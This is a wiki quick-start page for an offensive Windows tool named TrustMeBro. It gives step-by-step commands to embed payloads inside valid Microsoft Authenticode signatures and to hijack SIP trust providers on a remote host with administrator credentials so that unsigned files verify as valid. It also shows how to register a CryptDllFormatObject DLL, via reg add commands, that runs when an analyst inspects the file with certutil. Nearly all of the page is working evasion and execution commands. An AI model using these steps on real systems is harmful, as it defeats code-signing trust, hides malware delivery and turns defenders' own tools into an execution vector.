-
Notifications
You must be signed in to change notification settings - Fork 17
Quick Start
Kriyos Arcane edited this page Jul 4, 2026
·
1 revision
Three common scenarios. Each takes five steps or fewer.
Hide a payload inside a legitimately signed PE. The signature stays valid. No re-signing needed.
# 1. Pick a signed PE as your carrier (any Microsoft-signed binary works)
cp /mnt/c/Windows/System32/notepad.exe carrier.exe
# 2. Create your payload
echo "PAYLOAD_DATA_HERE" > payload.bin
# 3. Embed the payload into the carrier's PKCS#7 signature
python3 TrustMeBro.py embed -s carrier.exe -p payload.bin -o delivery.exe
# 4. Verify the signature is still valid
# On Windows: powershell -c "(Get-AuthenticodeSignature delivery.exe).Status"
# Expected: Valid
# 5. Extract on the other end
python3 TrustMeBro.py extract -s delivery.exe -o recovered.binFor stealth, use camouflage mode. The payload hides inside a fake nested signature structure that uses a known Microsoft OID:
python3 TrustMeBro.py embed -s carrier.exe -p payload.bin -o delivery.exe --camouflage
python3 TrustMeBro.py extract -s delivery.exe -o recovered.bin --camouflageMake any file pass signature verification on a remote Windows machine. Then reverse it.
# 1. Hijack the default SIP types (PE, PowerShell, MSI)
python3 TrustMeBro.py hijack 10.0.0.1 -u Administrator -p Password123
# 2. Verify on the target (open a NEW process after hijack)
# powershell -c "(Get-AuthenticodeSignature unsigned.exe).Status"
# Expected: Valid (any file passes now)
# 3. For maximum coverage, hijack all 17 SIP types
python3 TrustMeBro.py hijack 10.0.0.1 -u Admin -p Pass --sip-types all
# 4. Or use FinalPolicy for a single-write system-wide bypass
python3 TrustMeBro.py hijack 10.0.0.1 -u Admin -p Pass --action finalpolicy
# 5. Clean up when done
python3 TrustMeBro.py hijack 10.0.0.1 -u Admin -p Pass --action clean
python3 TrustMeBro.py hijack 10.0.0.1 -u Admin -p Pass --action finalpolicy-cleanOn the local Windows machine (no network, no credentials):
python3 TrustMeBro.py hijack --local --action hijack
python3 TrustMeBro.py hijack --local --action cleanOr with the C++ tool directly on the target:
TrustMeBro.exe hijack --sip-types PE,PowerShell,MSI
TrustMeBro.exe hijack --cleanRegister a DLL that loads when an analyst runs certutil -dump or opens certificate properties on a carrier PE. The analyst's own tooling becomes the execution vector.
# 1. Build the FormatGhost DLL (Linux cross-compile)
cd tools/FormatGhost && make
# 2. Copy format_ghost.dll to the target at C:\Temp\format_ghost.dll
# 3. Embed a payload into a signed PE using the matching OID
python3 TrustMeBro.py embed -s signed.exe -p payload.bin -o carrier.exe --oid 1.3.6.1.4.1.311.99.1
# 4. Register the OID handler on the target (admin required)
# On target: reg add "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFormatObject\1.3.6.1.4.1.311.99.1" /v Dll /t REG_SZ /d "C:\Temp\format_ghost.dll" /f
# On target: reg add "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFormatObject\1.3.6.1.4.1.311.99.1" /v FuncName /t REG_SZ /d "FormatObject" /f
# 5. Trigger: when anyone runs "certutil -dump carrier.exe", the DLL loads
# The DLL writes the payload bytes to %TEMP%\format_ghost_payload.binClean up:
reg delete "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFormatObject\1.3.6.1.4.1.311.99.1" /f